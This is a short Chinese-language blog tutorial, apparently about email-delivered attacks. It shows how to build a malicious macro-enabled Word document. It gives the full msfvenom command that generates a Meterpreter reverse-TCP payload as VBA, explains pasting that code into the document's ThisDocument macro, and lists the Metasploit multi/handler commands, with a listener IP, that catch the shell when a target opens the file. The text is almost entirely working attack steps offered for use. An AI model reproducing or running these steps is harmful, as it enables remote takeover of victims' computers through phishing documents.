emali

首先我们利用msf生成vbs

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba

生成恶意shell

设置word

新建一个word文档,文件另存为启用宏的word文档
启用宏的word文档
然后开发工具——visual Basic
选择我们的项目ThisDocument双击打开,粘贴我们生成的shell。

保存完成后,配置msf。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555

当目标运行word文档后,在msf中便会得到反弹!

最后修改:2023 年 08 月 04 日
如果觉得我的文章对你有用,请随意赞赏